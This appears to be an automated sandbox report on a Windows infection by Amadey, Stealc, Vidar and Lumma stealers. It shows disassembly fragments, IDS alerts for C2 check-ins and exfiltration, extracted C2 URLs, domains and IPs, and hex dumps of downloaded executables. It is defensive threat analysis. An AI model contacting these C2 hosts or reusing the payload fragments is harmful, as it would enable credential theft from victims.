                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]8_2_0040A960
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]8_2_00426170
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then push eax8_2_0040C36E
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h8_2_0043DBD0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov edx, ecx8_2_00409CC0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh8_2_0043DCF0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov byte ptr [edx], bl8_2_0040CE55
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]8_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov byte ptr [esi], al8_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]8_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]8_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov word ptr [eax], dx8_2_00417E82
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh8_2_0043E690
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]8_2_0042BFD3
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]8_2_0042BFDA
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_0042A060
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]8_2_00425F7D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov edx, ecx8_2_0041D074
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov edx, ecx8_2_0041D087
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov byte ptr [esi], cl8_2_0042D085
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov byte ptr [esi], cl8_2_0042D085
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]8_2_0041597D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]8_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov edi, eax8_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov ebx, eax8_2_00405910
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov ebp, eax8_2_00405910
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h8_2_00425920
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov word ptr [eax], cx8_2_004286F0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]8_2_00417190
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov byte ptr [edi+ebx], 00000000h8_2_0040C274
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov eax, dword ptr [00444284h]8_2_00425230
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_0043CAC0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]8_2_004292D0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov edx, ebx8_2_004292D0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]8_2_0042AAD0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov byte ptr [eax], cl8_2_00415ADC
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx ebx, bx8_2_0042536C
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]8_2_00402B70
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov word ptr [ecx], dx8_2_00427307
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]8_2_00436B20
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_0043CBD6
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then jmp eax8_2_0042B475
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h8_2_00419C10
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_0043CCE0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_0042B4BB
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_0043CD60
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_004345F0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]8_2_00427653
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_0043CE00
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h8_2_0042A630
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]8_2_004296D8
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]8_2_00415EE0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp al, 2Eh8_2_004266E7
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov word ptr [eax], cx8_2_004286F0
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]8_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov edi, eax8_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h8_2_0041CEA5
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then add ebx, 03h8_2_00428F5D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]8_2_00425F7D
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h8_2_00414F08
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then mov ecx, edx8_2_00414F08
                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h8_2_0043DFB0
                          Source: firefox.exeMemory has grown: Private usage: 1MB later: 95MB

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49736 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49738
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49757 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49782 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49808 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49838 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49848 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49848 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49848
                          Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49848 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49848
                          Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49848 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49870 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49905 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49944 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49961 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058159 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click) : 192.168.2.4:53795 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.4:49977 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.4:49987 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49983 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.4:50273 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.4:50257 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.4:50294 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.4:50323 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.4:50376 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.4:50345 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2058160 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI) : 192.168.2.4:50384 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50383
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50388 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50555 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50303 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49783 -> 116.203.10.31:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.10.31:443 -> 192.168.2.4:49783
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.10.31:443 -> 192.168.2.4:49795
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49977 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49977 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49986 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49986 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49987 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49987 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50256 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50256 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50257 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50345 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50367 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50384 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50413 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.10.31:443 -> 192.168.2.4:50402
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.10.31:443 -> 192.168.2.4:50412
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50448 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50458 -> 172.67.139.78:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                          Source: Malware configuration extractorURLs: dwell-exclaim.biz
                          Source: Malware configuration extractorURLs: se-blurry.biz
                          Source: Malware configuration extractorURLs: covery-mover.biz
                          Source: Malware configuration extractorURLs: drive-connect.cyou
                          Source: Malware configuration extractorURLs: dare-curbys.biz
                          Source: Malware configuration extractorURLs: formy-spill.biz
                          Source: Malware configuration extractorURLs: zinc-sneark.biz
                          Source: Malware configuration extractorURLs: impend-differ.biz
                          Source: Malware configuration extractorURLs: print-vexer.biz
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:52:10 GMTContent-Type: application/octet-streamContent-Length: 393728Last-Modified: Thu, 12 Dec 2024 07:55:00 GMTConnection: keep-aliveETag: "675a96d4-60200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 67 05 00 64 00 00 00 00 30 06 00 98 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 61 05 00 00 10 00 00 00 62 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ab 00 00 00 80 05 00 00 60 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 7a 1e 00 00 30 06 00 00 3c 00 00 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:52:16 GMTContent-Type: application/octet-streamContent-Length: 2660864Last-Modified: Thu, 12 Dec 2024 23:33:40 GMTConnection: keep-aliveETag: "675b72d4-289a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 28 00 00 04 00 00 64 6d 29 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 18 25 00 28 00 00 00 00 40 25 00 25 fb 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 28 00 1c 7f 00 00 80 0d 25 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0c 25 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 24 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 32 af 24 00 00 10 00 00 00 b0 24 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 5e 00 00 00 c0 24 00 00 60 00 00 00 b4 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 14 00 00 00 20 25 00 00 0a 00 00 00 14 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 25 fb 02 00 00 40 25 00 00 fc 02 00 00 1e 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 7f 00 00 00 40 28 00 00 80 00 00 00 1a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 12:52:25 GMTContent-Type: application/octet-streamContent-Length: 964608Last-Modified: Fri, 13 Dec 2024 12:24:26 GMTConnection: keep-aliveETag: "675c277a-eb800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 